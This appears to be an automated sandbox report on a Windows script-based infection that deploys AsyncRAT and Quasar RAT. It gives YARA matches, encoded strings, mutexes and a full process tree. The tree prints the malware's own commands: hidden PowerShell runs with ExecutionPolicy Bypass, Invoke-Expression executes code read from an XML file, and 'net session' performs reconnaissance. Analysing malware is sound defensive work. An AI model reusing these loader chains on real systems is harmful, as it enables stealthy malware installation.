              Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000016.00000002.4646402691.00000000066FB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.4523483443.00000000010D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Quasar_RAT_1 date = 2017-04-07, hash4 = f08db220df716de3d4f63f3007a03f902601b9b32099d6a882da87312f263f34, hash3 = 515c1a68995557035af11d818192f7866ef6a2018aa13112fefbe08395732e89, hash2 = 1ce40a89ef9d56fd32c00db729beecc17d54f4f7c27ff22f708a957cd3f9a4ec, hash1 = 0774d25e33ca2b1e2ee2fafe3fdbebecefbf1d4dd99e6460f0bc8713dd0fd740, author = Florian Roth, description = Detects Quasar RAT, reference = https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf, license = https://creativecommons.org/licenses/by-nc/4.0/
              Source: 00000016.00000002.4647656889.000000000673B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.4626854201.0000000005230000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.4646275028.00000000066F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000027.00000002.4004352545.000000000300F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 0000001F.00000002.2797263415.0000000000E02000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000016.00000002.4628005703.0000000005250000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000027.00000002.3995210664.0000000001249000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Asyncrat_11a11ba1 reference_sample = fe09cd1d13b87c5e970d3cbc1ebc02b1523c0a939f961fc02c1395707af1c6d1, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Asyncrat, fingerprint = 715ede969076cd413cebdfcf0cdda44e3a6feb5343558f18e656f740883b41b8, id = 11a11ba1-c178-4415-9c09-45030b500f50, last_modified = 2021-10-04
              Source: 0000001F.00000002.2808356805.0000000002B81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
              Source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: Process Memory Space: RegSvcs.exe PID: 3728, type: MEMORYSTRMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, EwV3ECxYhIse1SOarW.csCryptographic APIs: 'CreateDecryptor'
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, vrBADUWmYjhCttZTy.csBase64 encoded string: 'gqxh4ygzYVIfO8hr4z6DQxmk45Jyd9bbNdNP3RRNKVDRDyPwUq5GAuTLmP5VrMW43PRnF+pcVzHMvZ29ZarrLw==', 'uYXq4px9A6sxN3ugkJp0Kku1W54SRS6gB652/mjNkQaprEY6GTGZc2bm0rVVQA/Id67ATXEj78j4HHi3Wc85IFw5wx6r7s+BMIxilBuSoNE=', 'yjL+aPJSqRqDUPYon91fKcDeaOB3joEzpPydelmnVSlpNvx3qyKFDehtNJ/oqIO2kUDAU25+vjJfdo1BEnQB2A==', 'kfrpCzzzFN1EnymxkxKR2Tocsii201fIPBgXgmNfMbA5ipsVOKt234KWwgPjiq4y9XnzsOgQT+4huhP7OX+UFg==', 'g2aa8LSaYxpJrQYbTytLNPeKoequv42EMoy/iv86uDr58uLdquncXUvdhJNGb0cBGn6zl7pTyUWuO7UNCtEs5g==', 'Zzn8gAtxSQt3oqkpPzwovnLpyIlECDHyIqjhiQm2jIH9kaNw0UnhLtqS5DVj6Sn8Sm5SwR1y8JDCQG3rz17pfw==', 'nxfAaU84Ph48cNiebgKY8yQwpOM0qgylEjB+txIxPCffDE6ZJU7xc2sIAghinxOdFfhUdol+Se5HZlcmk/0tuQ=='
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, vrBADUWmYjhCttZTy.csBase64 encoded string: 'gqxh4ygzYVIfO8hr4z6DQxmk45Jyd9bbNdNP3RRNKVDRDyPwUq5GAuTLmP5VrMW43PRnF+pcVzHMvZ29ZarrLw==', 'uYXq4px9A6sxN3ugkJp0Kku1W54SRS6gB652/mjNkQaprEY6GTGZc2bm0rVVQA/Id67ATXEj78j4HHi3Wc85IFw5wx6r7s+BMIxilBuSoNE=', 'yjL+aPJSqRqDUPYon91fKcDeaOB3joEzpPydelmnVSlpNvx3qyKFDehtNJ/oqIO2kUDAU25+vjJfdo1BEnQB2A==', 'kfrpCzzzFN1EnymxkxKR2Tocsii201fIPBgXgmNfMbA5ipsVOKt234KWwgPjiq4y9XnzsOgQT+4huhP7OX+UFg==', 'g2aa8LSaYxpJrQYbTytLNPeKoequv42EMoy/iv86uDr58uLdquncXUvdhJNGb0cBGn6zl7pTyUWuO7UNCtEs5g==', 'Zzn8gAtxSQt3oqkpPzwovnLpyIlECDHyIqjhiQm2jIH9kaNw0UnhLtqS5DVj6Sn8Sm5SwR1y8JDCQG3rz17pfw==', 'nxfAaU84Ph48cNiebgKY8yQwpOM0qgylEjB+txIxPCffDE6ZJU7xc2sIAghinxOdFfhUdol+Se5HZlcmk/0tuQ=='
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, vrBADUWmYjhCttZTy.csBase64 encoded string: 'gqxh4ygzYVIfO8hr4z6DQxmk45Jyd9bbNdNP3RRNKVDRDyPwUq5GAuTLmP5VrMW43PRnF+pcVzHMvZ29ZarrLw==', 'uYXq4px9A6sxN3ugkJp0Kku1W54SRS6gB652/mjNkQaprEY6GTGZc2bm0rVVQA/Id67ATXEj78j4HHi3Wc85IFw5wx6r7s+BMIxilBuSoNE=', 'yjL+aPJSqRqDUPYon91fKcDeaOB3joEzpPydelmnVSlpNvx3qyKFDehtNJ/oqIO2kUDAU25+vjJfdo1BEnQB2A==', 'kfrpCzzzFN1EnymxkxKR2Tocsii201fIPBgXgmNfMbA5ipsVOKt234KWwgPjiq4y9XnzsOgQT+4huhP7OX+UFg==', 'g2aa8LSaYxpJrQYbTytLNPeKoequv42EMoy/iv86uDr58uLdquncXUvdhJNGb0cBGn6zl7pTyUWuO7UNCtEs5g==', 'Zzn8gAtxSQt3oqkpPzwovnLpyIlECDHyIqjhiQm2jIH9kaNw0UnhLtqS5DVj6Sn8Sm5SwR1y8JDCQG3rz17pfw==', 'nxfAaU84Ph48cNiebgKY8yQwpOM0qgylEjB+txIxPCffDE6ZJU7xc2sIAghinxOdFfhUdol+Se5HZlcmk/0tuQ=='
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, tfXIsBEmYODh.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winWSF@60/30@1/3
              Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\sExygfKkJDoIUpeo[1].txtJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3504:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2260:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4180:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1584:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3928:120:WilError_03
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\AsyncMutex_dHCTyo6u65FEkSZ3
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2940:120:WilError_03
              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2488:120:WilError_03
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iqo1c1k2.bm4.ps1Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"
              Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $commandJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs" Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" sessionJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "Jump to behavior
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 sessionJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" sessionJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "Jump to behavior
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\net.exe "C:\Windows\System32\net.exe" session
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
              Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 session
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
              Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: Binary string: NewPE2.pdb source: powershell.exe, 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NewPE2.pdbxf source: powershell.exe, 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000014.00000002.2558133112.000001384AA71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.3128607934.000002D910608000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000026.00000002.4422702432.000002B31F7AD000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              VBScript performs obfuscated calls to suspicious functions
